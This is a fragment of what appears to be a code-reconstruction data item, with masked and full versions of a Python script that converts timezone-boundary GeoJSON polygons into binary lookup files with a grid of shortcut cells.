"step-4": "<mask token>\n\n\ndef x_shortcut(lng):\n return floor((lng + 180) * NR_SHORTCUTS_PER_LNG)\n\n\ndef y_shortcut(lat):\n return floor((90 - lat) * NR_SHORTCUTS_PER_LAT)\n\n\ndef big_zone(xmax, xmin, ymax, ymin):\n return (xmax - xmin > 2 / NR_SHORTCUTS_PER_LNG and ymax - ymin > 2 /\n NR_SHORTCUTS_PER_LAT)\n\n\ndef percent(numerator, denominator):\n return round(numerator / denominator * 100, 2)\n\n\ndef accumulated_frequency(int_list):\n out = []\n total = sum(int_list)\n acc = 0\n for e in int_list:\n acc += e\n out.append(percent(acc, total))\n return out\n\n\ndef ints_of(line=0):\n x_coords, y_coords = all_coords[line]\n return [coord2int(x) for x in x_coords], [coord2int(x) for x in y_coords]\n\n\ndef contained(x, y, x_coords, y_coords):\n return inside_polygon(x, y, [x_coords, y_coords])\n\n\ndef unique(iterable):\n out = []\n for i in iterable:\n if i not in out:\n out.append(i)\n return out\n\n\ndef point_between(p1, p2):\n return p1[0] + (p2[0] - p1[0]) / 2, p1[1] + (p2[1] - p1[1]) / 2\n\n\ndef get_shortcuts(x, y):\n result = shortcuts.get((x, y))\n if result is None:\n return []\n else:\n return result\n\n\n<mask token>\n\n\ndef not_empty(iterable):\n for i in iterable:\n return True\n return False\n\n\ndef polys_of_one_zone():\n for i in range(len(timezone_names)):\n start = poly_nr2zone_id[i]\n end = poly_nr2zone_id[i + 1]\n yield list(range(start, end))\n\n\ndef replace_entry(iterable, entry, substitute):\n for i in range(len(iterable)):\n if iterable[i] == entry:\n iterable[i] = substitute\n return iterable\n\n\ndef _holes_in_poly(poly_nr):\n i = 0\n for nr in polynrs_of_holes:\n if nr == poly_nr:\n yield all_holes[i]\n i += 1\n\n\ndef parse_polygons_from_json(path=INPUT_JSON_FILE_NAME):\n global amount_of_holes\n global nr_of_lines\n global poly_zone_ids\n print('Parsing data from {}\\nthis could take a while...\\n'.format(path))\n tz_list = json.loads(open(path).read()).get('features')\n polygon_counter = 0\n current_zone_id = 0\n print('holes found at: (poly_nr zone_name)')\n for tz_dict in tz_list:\n if DEBUG and polygon_counter > DEBUG_POLY_STOP:\n break\n tz_name = tz_dict.get('properties').get('tzid')\n all_tz_names.append(tz_name)\n geometry = tz_dict.get('geometry')\n if geometry.get('type') == 'MultiPolygon':\n multipolygon = geometry.get('coordinates')\n else:\n multipolygon = [geometry.get('coordinates')]\n for poly_with_hole in multipolygon:\n x_coords, y_coords = list(zip(*poly_with_hole.pop(0)))\n x_coords = list(x_coords)\n y_coords = list(y_coords)\n x_coords.pop(-1)\n y_coords.pop(-1)\n all_coords.append((x_coords, y_coords))\n all_lengths.append(len(x_coords))\n all_boundaries.append((max(x_coords), min(x_coords), max(\n y_coords), min(y_coords)))\n poly_zone_ids.append(current_zone_id)\n for hole in poly_with_hole:\n print(polygon_counter, tz_name)\n amount_of_holes += 1\n polynrs_of_holes.append(polygon_counter)\n x_coords, y_coords = list(zip(*hole))\n x_coords = list(x_coords)\n y_coords = list(y_coords)\n x_coords.pop(-1)\n y_coords.pop(-1)\n all_holes.append((x_coords, y_coords))\n all_hole_lengths.append(len(x_coords))\n polygon_counter += 1\n current_zone_id += 1\n if max(all_lengths) >= 2 ** (8 * NR_BYTES_I):\n raise ValueError(\n 'amount of coords cannot be represented by int32 in poly_coord_amount.bin:'\n , max(all_lengths))\n if max(all_hole_lengths) >= 2 ** (8 * NR_BYTES_H):\n raise ValueError(\n 'amount of coords cannot be represented by short (int16) in hole_coord_amount.bin:'\n , max(all_hole_lengths))\n nr_of_lines = len(all_lengths)\n if polygon_counter != nr_of_lines:\n raise ValueError(\n 'polygon counter and entry number in all_length is different:',\n polygon_counter, nr_of_lines)\n if nr_of_lines >= 2 ** (8 * NR_BYTES_H):\n raise ValueError(\n 'polygon id cannot be encoded as short (int16) in hole_coord_amount.bin! there are'\n , nr_of_lines, 'polygons')\n if poly_zone_ids[-1] > 2 ** (8 * NR_BYTES_H):\n raise ValueError(\n 'zone id cannot be encoded as char (int8). the last id is',\n poly_zone_ids[-1])\n if 0 in all_lengths:\n raise ValueError()\n print('... parsing done.')\n print('maximal amount of coordinates in one polygon:', max(all_lengths))\n print('amount_of_holes:', amount_of_holes)\n print('amount of polygons:', nr_of_lines)\n print('\\n')\n\n\ndef update_zone_names(path=TIMEZONE_NAMES_FILE):\n global poly_zone_ids\n global list_of_pointers\n global all_boundaries\n global all_coords\n global all_lengths\n global polynrs_of_holes\n print('updating the zone names in {} now...'.format(path))\n with open(abspath(path), 'w') as f:\n f.write(json.dumps(all_tz_names))\n print('...Done.\\n\\nComputing where zones start and end...')\n i = 0\n last_id = -1\n for zone_id in poly_zone_ids:\n if zone_id != last_id:\n poly_nr2zone_id.append(i)\n if zone_id < last_id:\n raise ValueError()\n last_id = zone_id\n i += 1\n poly_nr2zone_id.append(i)\n print('...Done.\\n')\n\n\ndef compile_binaries():\n global nr_of_lines\n global shortcuts\n\n def print_shortcut_statistics():\n frequencies = []\n max_val = max(*nr_of_entries_in_shortcut)\n print('shortcut statistics:')\n print('highest entry amount is', max_val)\n while max_val >= 0:\n frequencies.append(nr_of_entries_in_shortcut.count(max_val))\n max_val -= 1\n frequencies.reverse()\n print('frequencies of entry amounts (from 0 to max entries):')\n print(frequencies)\n empty_shortcuts = frequencies[0]\n print('relative accumulated frequencies [%]:')\n acc = accumulated_frequency(frequencies)\n print(acc)\n print([round(100 - x, 2) for x in acc])\n print(percent(empty_shortcuts, amount_of_shortcuts),\n '% of all shortcuts are empty\\n')\n amount_of_different_zones = []\n for entry in shortcut_entries:\n registered_zone_ids = []\n for polygon_nr in entry:\n id = poly_zone_ids[polygon_nr]\n if id not in registered_zone_ids:\n registered_zone_ids.append(id)\n amount_of_different_zones.append(len(registered_zone_ids))\n frequencies = []\n max_val = max(*amount_of_different_zones)\n print('highest amount of different zones in one shortcut is', max_val)\n while max_val >= 1:\n frequencies.append(amount_of_different_zones.count(max_val))\n max_val -= 1\n frequencies.append(empty_shortcuts)\n frequencies.reverse()\n print('frequencies of entry amounts (from 0 to max):')\n print(frequencies)\n print('relative accumulated frequencies [%]:')\n acc = accumulated_frequency(frequencies)\n print(acc)\n print([round(100 - x, 2) for x in acc])\n print('--------------------------------\\n')\n\n def included_shortcut_row_nrs(max_lat, min_lat):\n return list(range(y_shortcut(max_lat), y_shortcut(min_lat) + 1))\n\n def included_shortcut_column_nrs(max_lng, min_lng):\n return list(range(x_shortcut(min_lng), x_shortcut(max_lng) + 1))\n\n def longitudes_to_check(max_lng, min_lng):\n output_list = []\n step = 1 / NR_SHORTCUTS_PER_LNG\n current = ceil(min_lng * NR_SHORTCUTS_PER_LNG) / NR_SHORTCUTS_PER_LNG\n end = floor(max_lng * NR_SHORTCUTS_PER_LNG) / NR_SHORTCUTS_PER_LNG\n while current < end:\n output_list.append(current)\n current += step\n output_list.append(end)\n return output_list\n\n def latitudes_to_check(max_lat, min_lat):\n output_list = []\n step = 1 / NR_SHORTCUTS_PER_LAT\n current = ceil(min_lat * NR_SHORTCUTS_PER_LAT) / NR_SHORTCUTS_PER_LAT\n end = floor(max_lat * NR_SHORTCUTS_PER_LAT) / NR_SHORTCUTS_PER_LAT\n while current < end:\n output_list.append(current)\n current += step\n output_list.append(end)\n return output_list\n\n def compute_x_intersection(y, x1, x2, y1, y2):\n \"\"\"returns the x intersection from a horizontal line in y with the line from x1,y1 to x1,y2\n \"\"\"\n delta_y = y2 - y1\n if delta_y == 0:\n return x1\n return (y - y1) * (x2 - x1) / delta_y + x1\n\n def compute_y_intersection(x, x1, x2, y1, y2):\n \"\"\"returns the y intersection from a vertical line in x with the line from x1,y1 to x1,y2\n \"\"\"\n delta_x = x2 - x1\n if delta_x == 0:\n return x1\n return (x - x1) * (y2 - y1) / delta_x + y1\n\n def x_intersections(y, x_coords, y_coords):\n intersects = []\n for i in range(len(y_coords) - 1):\n iplus1 = i + 1\n if y_coords[i] <= y:\n if y_coords[iplus1] > y:\n intersects.append(compute_x_intersection(y, x_coords[i],\n x_coords[iplus1], y_coords[i], y_coords[iplus1]))\n elif y_coords[iplus1] <= y:\n intersects.append(compute_x_intersection(y, x_coords[i],\n x_coords[iplus1], y_coords[i], y_coords[iplus1]))\n return intersects\n\n def y_intersections(x, x_coords, y_coords):\n intersects = []\n for i in range(len(y_coords) - 1):\n iplus1 = i + 1\n if x_coords[i] <= x:\n if x_coords[iplus1] > x:\n intersects.append(compute_y_intersection(x, x_coords[i],\n x_coords[iplus1], y_coords[i], y_coords[iplus1]))\n elif x_coords[iplus1] <= x:\n intersects.append(compute_y_intersection(x, x_coords[i],\n x_coords[iplus1], y_coords[i], y_coords[iplus1]))\n return intersects\n\n def compute_exact_shortcuts(xmax, xmin, ymax, ymin, line):\n shortcuts_for_line = set()\n x_longs, y_longs = ints_of(line)\n y_longs.append(y_longs[0])\n x_longs.append(x_longs[0])\n step = 1 / NR_SHORTCUTS_PER_LAT\n for lat in latitudes_to_check(ymax, ymin):\n intersects = sorted([int2coord(x) for x in x_intersections(\n coord2int(lat), x_longs, y_longs)])\n nr_of_intersects = len(intersects)\n if nr_of_intersects % 2 != 0:\n raise ValueError(\n 'an uneven number of intersections has been accounted')\n for i in range(0, nr_of_intersects, 2):\n possible_longitudes = []\n iplus = i + 1\n intersection_in = intersects[i]\n intersection_out = intersects[iplus]\n if intersection_in == intersection_out:\n if contained(coord2int(intersection_in), coord2int(lat) +\n 1, x_longs, y_longs):\n shortcuts_for_line.add((x_shortcut(intersection_in),\n y_shortcut(lat) - 1))\n shortcuts_for_line.add((x_shortcut(intersection_in),\n y_shortcut(lat)))\n else:\n possible_y_shortcut = y_shortcut(lat)\n middle = intersection_in + (intersection_out -\n intersection_in) / 2\n if contained(coord2int(middle), coord2int(lat) + 1,\n x_longs, y_longs):\n while intersection_in < intersection_out:\n possible_longitudes.append(intersection_in)\n intersection_in += step\n possible_longitudes.append(intersection_out)\n possible_y_shortcut_min1 = possible_y_shortcut - 1\n for possible_x_coord in possible_longitudes:\n shortcuts_for_line.add((x_shortcut(\n possible_x_coord), possible_y_shortcut))\n shortcuts_for_line.add((x_shortcut(\n possible_x_coord), possible_y_shortcut_min1))\n else:\n while intersection_in < intersection_out:\n possible_longitudes.append(intersection_in)\n intersection_in += step\n possible_longitudes.append(intersection_out)\n for possible_x_coord in possible_longitudes:\n shortcuts_for_line.add((x_shortcut(\n possible_x_coord), possible_y_shortcut))\n step = 1 / NR_SHORTCUTS_PER_LAT\n for lng in longitudes_to_check(xmax, xmin):\n intersects = sorted([int2coord(y) for y in y_intersections(\n coord2int(lng), x_longs, y_longs)])\n nr_of_intersects = len(intersects)\n if nr_of_intersects % 2 != 0:\n raise ValueError(\n 'an uneven number of intersections has been accounted')\n possible_latitudes = []\n for i in range(0, nr_of_intersects, 2):\n iplus = i + 1\n intersection_in = intersects[i]\n intersection_out = intersects[iplus]\n if intersection_in == intersection_out:\n if contained(coord2int(lng) - 1, coord2int(\n intersection_in), x_longs, y_longs):\n shortcuts_for_line.add((x_shortcut(lng) - 1,\n y_shortcut(intersection_in)))\n shortcuts_for_line.add((x_shortcut(lng), y_shortcut(\n intersection_in)))\n else:\n possible_x_shortcut = x_shortcut(lng)\n middle = intersection_in + (intersection_out -\n intersection_in) / 2\n if contained(coord2int(lng) - 1, coord2int(middle),\n x_longs, y_longs):\n while intersection_in < intersection_out:\n possible_latitudes.append(intersection_in)\n intersection_in += step\n possible_latitudes.append(intersection_out)\n possible_x_shortcut_min1 = possible_x_shortcut - 1\n for possible_latitude in possible_latitudes:\n shortcuts_for_line.add((possible_x_shortcut,\n y_shortcut(possible_latitude)))\n shortcuts_for_line.add((\n possible_x_shortcut_min1, y_shortcut(\n possible_latitude)))\n else:\n while intersection_in < intersection_out:\n possible_latitudes.append(intersection_in)\n intersection_in += step\n possible_latitudes.append(intersection_out)\n for possible_latitude in possible_latitudes:\n shortcuts_for_line.add((possible_x_shortcut,\n y_shortcut(possible_latitude)))\n return shortcuts_for_line\n\n def construct_shortcuts():\n print('building shortucts...')\n print('currently at polygon nr:')\n line = 0\n for xmax, xmin, ymax, ymin in all_boundaries:\n if line % 100 == 0:\n print(line)\n column_nrs = included_shortcut_column_nrs(xmax, xmin)\n row_nrs = included_shortcut_row_nrs(ymax, ymin)\n if big_zone(xmax, xmin, ymax, ymin):\n shortcuts_for_line = compute_exact_shortcuts(xmax, xmin,\n ymax, ymin, line)\n min_x_shortcut = column_nrs[0]\n max_x_shortcut = column_nrs[-1]\n min_y_shortcut = row_nrs[0]\n max_y_shortcut = row_nrs[-1]\n shortcuts_to_remove = []\n for x, y in shortcuts_for_line:\n if (x < min_x_shortcut or x > max_x_shortcut or y <\n min_y_shortcut or y > max_y_shortcut):\n shortcuts_to_remove.append((x, y))\n for s in shortcuts_to_remove:\n shortcuts_for_line.remove(s)\n if len(shortcuts_for_line) > len(column_nrs) * len(row_nrs):\n raise ValueError(\n 'there are more shortcuts than before now. there is something wrong with the algorithm!'\n )\n if len(shortcuts_for_line) < 3:\n raise ValueError(\n 'algorithm not valid! less than 3 zones detected (should be at least 3)'\n )\n else:\n shortcuts_for_line = []\n for column_nr in column_nrs:\n for row_nr in row_nrs:\n shortcuts_for_line.append((column_nr, row_nr))\n for shortcut in shortcuts_for_line:\n shortcuts[shortcut] = shortcuts.get(shortcut, []) + [line]\n line += 1\n start_time = datetime.now()\n construct_shortcuts()\n end_time = datetime.now()\n print('calculating the shortcuts took:', end_time - start_time, '\\n')\n nr_of_floats = 2 * sum(all_lengths)\n nr_of_entries_in_shortcut = []\n shortcut_entries = []\n amount_filled_shortcuts = 0\n\n def sort_poly_shortcut(poly_nrs):\n polygon_ids = [poly_zone_ids[poly_nr] for poly_nr in poly_nrs]\n id_freq = [polygon_ids.count(id) for id in polygon_ids]\n zipped = list(zip(poly_nrs, polygon_ids, id_freq))\n sort = sorted(sorted(zipped, key=lambda x: x[1]), key=lambda x: x[2])\n return [x[0] for x in sort]\n for x in range(360 * NR_SHORTCUTS_PER_LNG):\n for y in range(180 * NR_SHORTCUTS_PER_LAT):\n try:\n shortcuts_this_entry = shortcuts[x, y]\n shortcut_entries.append(sort_poly_shortcut(\n shortcuts_this_entry))\n amount_filled_shortcuts += 1\n nr_of_entries_in_shortcut.append(len(shortcuts_this_entry))\n except KeyError:\n nr_of_entries_in_shortcut.append(0)\n amount_of_shortcuts = len(nr_of_entries_in_shortcut)\n print_shortcut_statistics()\n if (amount_of_shortcuts != 360 * 180 * NR_SHORTCUTS_PER_LNG *\n NR_SHORTCUTS_PER_LAT):\n print(amount_of_shortcuts)\n raise ValueError('this number of shortcut zones is wrong')\n print('The number of filled shortcut zones are:',\n amount_filled_shortcuts, '(=', round(amount_filled_shortcuts /\n amount_of_shortcuts * 100, 2), '% of all shortcuts)')\n shortcut_space = (360 * NR_SHORTCUTS_PER_LNG * 180 *\n NR_SHORTCUTS_PER_LAT * (NR_BYTES_H + NR_BYTES_I))\n for nr in nr_of_entries_in_shortcut:\n shortcut_space += NR_BYTES_H * nr\n print('The number of polygons is:', nr_of_lines)\n print('The number of floats in all the polygons is (2 per point):',\n nr_of_floats)\n path = 'poly_nr2zone_id.bin'\n print('writing file', path)\n output_file = open(path, 'wb')\n for zone_id in poly_nr2zone_id:\n output_file.write(pack(b'<H', zone_id))\n output_file.close()\n print('Done\\n')\n path = 'poly_zone_ids.bin'\n print('writing file \"', path, '\"')\n output_file = open(path, 'wb')\n for zone_id in poly_zone_ids:\n output_file.write(pack(b'<H', zone_id))\n output_file.close()\n path = 'poly_max_values.bin'\n print('writing file \"', path, '\"')\n output_file = open(path, 'wb')\n for xmax, xmin, ymax, ymin in all_boundaries:\n output_file.write(pack(b'<iiii', coord2int(xmax), coord2int(xmin),\n coord2int(ymax), coord2int(ymin)))\n output_file.close()\n path = 'poly_data.bin'\n print('writing file \"', path, '\"')\n output_file = open(path, 'wb')\n addresses = []\n i = 0\n for x_coords, y_coords in all_coords:\n addresses.append(output_file.tell())\n if all_lengths[i] != len(x_coords):\n raise ValueError('x_coords do not have the expected length!',\n all_lengths[i], len(x_coords))\n for x in x_coords:\n output_file.write(pack(b'<i', coord2int(x)))\n for y in y_coords:\n output_file.write(pack(b'<i', coord2int(y)))\n i += 1\n output_file.close()\n path = 'poly_adr2data.bin'\n print('writing file \"', path, '\"')\n output_file = open(path, 'wb')\n for adr in addresses:\n output_file.write(pack(b'<I', adr))\n output_file.close()\n path = 'poly_coord_amount.bin'\n print('writing file \"', path, '\"')\n output_file = open(path, 'wb')\n for length in all_lengths:\n output_file.write(pack(b'<I', length))\n output_file.close()\n path = 'shortcuts_entry_amount.bin'\n print('writing file \"', path, '\"')\n output_file = open(path, 'wb')\n for nr in nr_of_entries_in_shortcut:\n if nr > 300:\n raise ValueError('There are too many polygons in this shortcut:',\n nr)\n output_file.write(pack(b'<H', nr))\n output_file.close()\n adr = 0\n path = 'shortcuts_adr2data.bin'\n print('writing file \"', path, '\"')\n output_file = open(path, 'wb')\n for nr in nr_of_entries_in_shortcut:\n if nr == 0:\n output_file.write(pack(b'<I', 0))\n else:\n output_file.write(pack(b'<I', adr))\n adr += 2 * nr\n output_file.close()\n path = 'shortcuts_data.bin'\n print('writing file \"', path, '\"')\n output_file = open(path, 'wb')\n for entries in shortcut_entries:\n for entry in entries:\n if entry > nr_of_lines:\n raise ValueError(entry)\n output_file.write(pack(b'<H', entry))\n output_file.close()\n path = 'shortcuts_unique_id.bin'\n print('writing file \"', path, '\"')\n output_file = open(path, 'wb')\n if poly_zone_ids[-1] >= INVALID_ZONE_ID:\n raise ValueError(\n 'There are too many zones for this data type (H). The shortcuts_unique_id file need a Invalid Id!'\n )\n for x in range(360 * NR_SHORTCUTS_PER_LNG):\n for y in range(180 * NR_SHORTCUTS_PER_LAT):\n try:\n shortcuts_this_entry = shortcuts[x, y]\n unique_id = poly_zone_ids[shortcuts_this_entry[0]]\n for nr in shortcuts_this_entry:\n if poly_zone_ids[nr] != unique_id:\n unique_id = INVALID_ZONE_ID\n break\n output_file.write(pack(b'<H', unique_id))\n except KeyError:\n output_file.write(pack(b'<H', INVALID_ZONE_ID))\n output_file.close()\n hole_space = 0\n path = 'hole_poly_ids.bin'\n print('writing file \"', path, '\"')\n output_file = open(path, 'wb')\n i = 0\n for line in polynrs_of_holes:\n if line > nr_of_lines:\n raise ValueError(line, nr_of_lines)\n output_file.write(pack(b'<H', line))\n i += 1\n hole_space += output_file.tell()\n output_file.close()\n if i > amount_of_holes:\n raise ValueError('There are more related lines than holes.')\n path = 'hole_coord_amount.bin'\n print('writing file \"', path, '\"')\n output_file = open(path, 'wb')\n for length in all_hole_lengths:\n output_file.write(pack(b'<H', length))\n hole_space += output_file.tell()\n output_file.close()\n adr = 0\n path = 'hole_adr2data.bin'\n print('writing file \"', path, '\"')\n output_file = open(path, 'wb')\n for length in all_hole_lengths:\n output_file.write(pack(b'<I', adr))\n adr += 2 * NR_BYTES_I * length\n hole_space += output_file.tell()\n output_file.close()\n path = 'hole_data.bin'\n print('writing file \"', path, '\"')\n output_file = open(path, 'wb')\n for x_coords, y_coords in all_holes:\n for x in x_coords:\n output_file.write(pack(b'<i', coord2int(x)))\n for y in y_coords:\n output_file.write(pack(b'<i', coord2int(y)))\n hole_space += output_file.tell()\n output_file.close()\n polygon_space = nr_of_floats * NR_BYTES_I\n total_space = polygon_space + hole_space + shortcut_space\n print('the polygon data makes up', percent(polygon_space, total_space),\n '% of the data')\n print('the shortcuts make up', percent(shortcut_space, total_space),\n '% of the data')\n print('holes make up', percent(hole_space, total_space), '% of the data')\n print('Success!')\n return\n\n\n<mask token>\n",
"step-5": "# -*- coding:utf-8 -*-\nimport json\nfrom datetime import datetime\nfrom math import ceil, floor\nfrom os.path import abspath, join, pardir\nfrom struct import pack\n\nfrom .global_settings import (\n DEBUG, DEBUG_POLY_STOP, INPUT_JSON_FILE_NAME, INVALID_ZONE_ID, NR_BYTES_H, NR_BYTES_I, NR_SHORTCUTS_PER_LAT,\n NR_SHORTCUTS_PER_LNG, TIMEZONE_NAMES_FILE,\n)\n# # # keep in mind: the faster numba optimized helper fct. cannot be used here,\n# # # because numpy classes are not being used at this stage yet!\nfrom .helpers import coord2int, inside_polygon, int2coord\n\n# from helpers import coord2int, inside_polygon, int2coord\n# from global_settings import (\n# DEBUG, DEBUG_POLY_STOP, INPUT_JSON_FILE_NAME, INVALID_ZONE_ID, NR_BYTES_H, NR_BYTES_I, NR_SHORTCUTS_PER_LAT,\n# NR_SHORTCUTS_PER_LNG, TIMEZONE_NAMES_FILE,\n# )\n\n\n# import sys\n# from os.path import dirname\n#\n# sys.path.insert(0, dirname(__file__))\n# from helpers import coord2int, int2coord, inside_polygon\n\n\n\"\"\"\nTODO write tests\n\nUSE INSTRUCTIONS:\n\n- download the latest timezones.geojson.zip file from github.com/evansiroky/timezone-boundary-builder/releases\n- unzip and place the combined.json inside this timezonefinder folder\n- run this file_converter.py as a script until the compilation of the binary files is completed.\n\n\nIMPORTANT: all coordinates (floats) are being converted to int32 (multiplied by 10^7). This makes computations faster\nand it takes lot less space, without loosing too much accuracy (min accuracy (=at the equator) is still 1cm !)\n\nB = unsigned char (1byte = 8bit Integer)\nH = unsigned short (2 byte integer)\nI = unsigned 4byte integer\ni = signed 4byte integer\n\n\nBinaries being written:\n\n[POLYGONS:] there are approx. 1k Polygons (evansiroky/timezone-boundary-builder 2017a)\npoly_zone_ids: the related zone_id for every polygon ('<H')\npoly_coord_amount: the amount of coordinates in every polygon ('<I')\npoly_adr2data: address in poly_data.bin where data for every polygon starts ('<I')\npoly_max_values: boundaries for every polygon ('<iiii': xmax, xmin, ymax, ymin)\npoly_data: coordinates for every polygon (multiple times '<i') (for every polygon first all x then all y values!)\npoly_nr2zone_id: the polygon number of the first polygon from every zone('<H')\n\n[HOLES:] number of holes (162 evansiroky/timezone-boundary-builder 2018d)\nhole_poly_ids: the related polygon_nr (=id) for every hole ('<H')\nhole_coord_amount: the amount of coordinates in every hole ('<H')\nhole_adr2data: address in hole_data.bin where data for every hole starts ('<I')\nhole_data: coordinates for every hole (multiple times '<i')\n\n[SHORTCUTS:] the surface of the world is split up into a grid of shortcut rectangles.\n-> there are a total of 360 * NR_SHORTCUTS_PER_LNG * 180 * NR_SHORTCUTS_PER_LAT shortcuts\nshortcut here means storing for every cell in a grid of the world map which polygons are located in that cell\nthey can therefore be used to drastically reduce the amount of polygons which need to be checked in order to\ndecide which timezone a point is located in.\n\nthe list of polygon ids in each shortcut is sorted after freq. of appearance of their zone id\nthis is critical for ruling out zones faster (as soon as just polygons of one zone are left this zone can be returned)\n\nshortcuts_entry_amount: the amount of polygons for every shortcut ('<H')\nshortcuts_adr2data: address in shortcut_data.bin where data for every shortcut starts ('<I')\nshortcuts_data: polygon numbers (ids) for every shortcut (multiple times '<H')\nshortcuts_unique_id: the zone id if only polygons from one zone are present,\n a high number (with no corresponding zone) if not ('<H').\n the majority of zones either have no polygons at all (sea) or just one zone.\n this zone then can be instantly returned without actually testing polygons.\n\nalso stored extra binary if only one zone (to directly return that zone without checking)\n\n\n\nstatistics: (data version 2018g)\n\n\nmaximal amount of coordinates in one polygon: 139130\namount_of_holes: 219\namount of polygons: 1177\n\nshortcut statistics:\nhighest entry amount is 46\nfrequencies of entry amounts (from 0 to max entries):\n[76359, 45216, 7204, 710, 81, 17, 4, 1, 3, 0, 0, 0, 1, 0, 0, 0, 1, 0, 0, 0, 0, 0, 0, 1, 0, 0, 0, 0, 0, 0, 0, 0, 1, 0,\n 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 1]\nrelative accumulated frequencies [%]:\n[58.92, 93.81, 99.37, 99.91, 99.98, 99.99, 99.99, 99.99, 100.0, 100.0, 100.0, 100.0, 100.0, 100.0, 100.0, 100.0, 100.0,\n 100.0, 100.0, 100.0, 100.0, 100.0, 100.0, 100.0, 100.0, 100.0, 100.0, 100.0, 100.0, 100.0, 100.0, 100.0, 100.0,\n 100.0, 100.0, 100.0, 100.0, 100.0, 100.0, 100.0, 100.0, 100.0, 100.0, 100.0, 100.0, 100.0, 100.0]\n[41.08, 6.19, 0.63, 0.09, 0.02, 0.01, 0.01, 0.01, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0,\n 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0,\n 0.0, 0.0, 0.0, 0.0]\n58.92 % of all shortcuts are empty\n\nhighest amount of different zones in one shortcut is 7\nfrequencies of entry amounts (from 0 to max):\n[76359, 45555, 6963, 672, 43, 6, 1, 1]\nrelative accumulated frequencies [%]:\n[58.92, 94.07, 99.44, 99.96, 99.99, 100.0, 100.0, 100.0]\n[41.08, 5.93, 0.56, 0.04, 0.01, 0.0, 0.0, 0.0]\n--------------------------------\n\nThe number of filled shortcut zones are: 53241 (= 41.08 % of all shortcuts)\nThe number of polygons is: 1177\nThe number of floats in all the polygons is (2 per point): 10887056\nwriting file \" poly_nr2zone_id.bin \"\nDone\n\nwriting file \" poly_zone_ids.bin \"\nwriting file \" poly_max_values.bin \"\nwriting file \" poly_data.bin \"\nwriting file \" poly_adr2data.bin \"\nwriting file \" poly_coord_amount.bin \"\nwriting file \" shortcuts_entry_amount.bin \"\nwriting file \" shortcuts_adr2data.bin \"\nwriting file \" shortcuts_data.bin \"\nwriting file \" shortcuts_unique_id.bin \"\nwriting file \" hole_poly_ids.bin \"\nwriting file \" hole_coord_amount.bin \"\nwriting file \" hole_adr2data.bin \"\nwriting file \" hole_data.bin \"\nthe polygon data makes up 97.11 % of the data\nthe shortcuts make up 2.01 % of the data\nholes make up 0.88 % of the data\n\"\"\"\n\nnr_of_lines = -1\nall_tz_names = []\npoly_zone_ids = []\nall_boundaries = []\nall_coords = []\nall_lengths = []\namount_of_holes = 0\npolynrs_of_holes = []\nall_holes = []\nall_hole_lengths = []\nlist_of_pointers = []\npoly_nr2zone_id = []\nshortcuts = {}\n\n\ndef x_shortcut(lng):\n # higher (=lng) means higher x shortcut!!! 0 (-180deg lng) -> 360 (180deg)\n # if lng < -180 or lng >= 180:\n # raise ValueError('longitude out of bounds', lng)\n return floor((lng + 180) * NR_SHORTCUTS_PER_LNG)\n\n\ndef y_shortcut(lat):\n # lower y (=lat) means higher y shortcut!!! 0 (90deg lat) -> 180 (-90deg)\n # if lat < -90 or lat >= 90:\n # raise ValueError('this latitude is out of bounds', lat)\n return floor((90 - lat) * NR_SHORTCUTS_PER_LAT)\n\n\ndef big_zone(xmax, xmin, ymax, ymin):\n # returns True if a zone with those boundaries could have more than 4 shortcuts\n return xmax - xmin > 2 / NR_SHORTCUTS_PER_LNG and ymax - ymin > 2 / NR_SHORTCUTS_PER_LAT\n\n\ndef percent(numerator, denominator):\n return round((numerator / denominator) * 100, 2)\n\n\ndef accumulated_frequency(int_list):\n out = []\n total = sum(int_list)\n acc = 0\n for e in int_list:\n acc += e\n out.append(percent(acc, total))\n\n return out\n\n\ndef ints_of(line=0):\n x_coords, y_coords = all_coords[line]\n return [coord2int(x) for x in x_coords], [coord2int(x) for x in y_coords]\n\n\ndef contained(x, y, x_coords, y_coords):\n return inside_polygon(x, y, [x_coords, y_coords])\n\n\ndef unique(iterable):\n out = []\n for i in iterable:\n if i not in out:\n out.append(i)\n return out\n\n\ndef point_between(p1, p2):\n return p1[0] + (p2[0] - p1[0]) / 2, p1[1] + (p2[1] - p1[1]) / 2\n\n\ndef get_shortcuts(x, y):\n result = shortcuts.get((x, y))\n if result is None:\n return []\n else:\n return result\n\n\ndef _polygons(id_list):\n for i in id_list:\n yield all_coords[i]\n\n\ndef not_empty(iterable):\n for i in iterable:\n return True\n return False\n\n\ndef polys_of_one_zone():\n for i in range(len(timezone_names)):\n start = poly_nr2zone_id[i]\n end = poly_nr2zone_id[i + 1]\n yield list(range(start, end))\n\n\ndef replace_entry(iterable, entry, substitute):\n for i in range(len(iterable)):\n if iterable[i] == entry:\n iterable[i] = substitute\n return iterable\n\n\ndef _holes_in_poly(poly_nr):\n i = 0\n for nr in polynrs_of_holes:\n if nr == poly_nr:\n yield all_holes[i]\n i += 1\n\n\ndef parse_polygons_from_json(path=INPUT_JSON_FILE_NAME):\n global amount_of_holes\n global nr_of_lines\n global poly_zone_ids\n\n print('Parsing data from {}\\nthis could take a while...\\n'.format(path))\n tz_list = json.loads(open(path).read()).get('features')\n # this counter just counts polygons, not holes!\n polygon_counter = 0\n current_zone_id = 0\n print('holes found at: (poly_nr zone_name)')\n for tz_dict in tz_list:\n if DEBUG and polygon_counter > DEBUG_POLY_STOP:\n break\n\n tz_name = tz_dict.get('properties').get(\"tzid\")\n # print(tz_name)\n all_tz_names.append(tz_name)\n geometry = tz_dict.get(\"geometry\")\n if geometry.get('type') == 'MultiPolygon':\n # depth is 4\n multipolygon = geometry.get(\"coordinates\")\n else:\n # depth is 3 (only one polygon, possibly with holes!)\n multipolygon = [geometry.get(\"coordinates\")]\n # multipolygon has depth 4\n # assert depth_of_array(multipolygon) == 4\n for poly_with_hole in multipolygon:\n # assert len(poly_with_hole) > 0\n # the first entry is polygon\n x_coords, y_coords = list(zip(*poly_with_hole.pop(0)))\n # IMPORTANT: do not use the last value (is equal to the first)!\n x_coords = list(x_coords)\n y_coords = list(y_coords)\n x_coords.pop(-1)\n y_coords.pop(-1)\n all_coords.append((x_coords, y_coords))\n # assert len(x_coords) > 0\n all_lengths.append(len(x_coords))\n all_boundaries.append((max(x_coords), min(x_coords), max(y_coords), 